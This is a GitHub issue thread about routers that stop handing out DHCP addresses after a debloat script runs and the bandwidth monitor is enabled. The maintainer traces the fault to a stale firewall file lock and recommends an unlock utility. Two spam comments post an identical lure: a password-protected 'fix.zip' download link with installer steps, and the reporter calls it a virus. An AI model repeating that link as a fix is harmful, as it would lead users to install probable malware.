### ISSUE TITLE
Soft bricked device after enabling bandwith monitor & de-telstra -M (min memory)

### ISSUE THREAD

**Issue by browntownington** [seud0nym/tch-gui-unhide#211]
This seems to relate to CobraXh devices on 20.4 or 21.4. Using latest stable releases f tch-gui-unhide/de-telstra and updated scripts.

It's been difficult to pinpoint the exact root cause. I must of soft bricked the devices 20-30 times trying work out exactly what the trigger was. When I say softbrick, the device boots, LEDS all appear normal. But DHCP doesn't give IP's out. Manually configuring static IP's don't allow access to the gateway.    

To replicate this issue:

./de-telstra -M
./tch-gui-unhide

In GUI
enable bandwidth monitor in devices card (I believe it may also be triggered by enabling auto discover ntp in cobraxh card, but don't quote me on this as I often enabled this and bandwidth monitor at the same time.)

Reboot

Soft bricked. Required hard factor reset.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by browntownington** [comment]
Nice try virus man. You have been reported.

**Comment by seud0nym** [comment]
I can't test this right now, but my first suggestion is to try and restart the following services after you make your changes, and check the log for any additional error messages:
```
/etc/init.d/dnsmasq restart
/etc/init.d/firewall restart
```

The symptoms you describe would seem to indicate a problem with dnsmasq, rather than bandwidth monitoring, which just adds a chain of firewall rules that always just continue whether they match or not. I wouldn't have thought the firewall changes would prevent you from getting an IP address via DHCP, but I guess stranger things have happened.

If it is a problem with dnsmasq, you shouldn't have any issues with a connected session (as long as you don't reboot). If restarting the service shows up an error, you should be able to undo your change to prevent soft-bricking.

The thing is, none of those things you talk about doing should affect dnsmasq. It is the DHCP server and DNS resolver proxy.

You could also try restarting networking to look for errors. Again, you shouldn't lose a connected SSH session, but you might.
```
/etc/init.d/network restart
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by browntownington** [comment]
I found it super tricky to pin point the exact trigger.
Thanks for those tips.
I'll follow what you said and let you know what I find.

**Comment by browntownington** [comment]
I did a ./de-telstra -M, rebooted, enabled bandwidth monitor and took a baseline of existing errors, then ran your commands.

After running,
`/etc/init.d/dnsmasq restart`
I got this
`Mon Aug 26 18:45:58 2024 daemon.err dnsmasq[28911]: Cannot add object to UBus: Invalid argument`

After running,
`/etc/init.d/firewall restart`
I got nothing sus.


After running,
`/etc/init.d/network restart`
I found these suspect errors:
```
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:15 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:16 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:16 2024 daemon.err odhcpd[7688]: setsockopt(SO_BINDTODEVICE): No such device
Mon Aug 26 18:50:17 2024 daemon.err dnsmasq[30655]: Cannot add object to UBus: Invalid argument
Mon Aug 26 18:50:20 2024 daemon.err dnsmasq[31199]: Cannot add object to UBus: Invalid argument
```


I hope this is somewhat meaning for to you :)

**Comment by seud0nym** [comment]
I can reliably reproduce this (except that no device gets an IP address), but I have no idea what is causing it.

I will continue looking into it.

**Comment by browntownington** [comment]
Okay thats a start!

I just tried connecting to the main wifi network on a different client and couldn't get an address. I believe the client I was using had cached it's dhcp address locally. Maybe cause the lease hadn't expired.

**Comment by seud0nym** [comment]
Okay. I think I know what the problem is.

A bit of background: I have noticed on multiple occassions that the firewall service has a tendency to get itself blocked on a file lock. Essentially, it takes out a file lock before doing any operation to ensure that mutliple invocations at the same time do not interfere with each other. If another operation starts during an existing one, it _should_ wait until the first is completed.

However, there is a bug somewhere, and under some circumstance that I am yet to work out, the file lock does not get released. Any subsequent operation then hangs indefinitely, blocked by the file lock. This is a bug in the stock firmware, _not_ tch-gui-unhide.

The most usual manifestation is that port forwards (which are a firewall function) do not appear to work until a reboot, because the restart to apply the change is blocked by a previous operation that did not release the file lock.

So, what I think is happening is that firewall is being blocked at a point where the default state is to block everything, including DHCP, GUI access, SSH, etc.

Because it was easier for me to solve the symptom that track down the bug, I wrote a script called [unflock](https://github.com/seud0nym/tch-gui-unhide/tree/master/utilities#unflock), to remove stale file locks.

So, try resetting your device, then do what you would normally do, _after_ setting up `unflock` to check and remove stale locks every minute. The commands are:
```
./unflock -C
./de-telstra -M
./tch-gui-unhide
```

I have just done this on my test Gen 3, and it is working after multiple reboots.
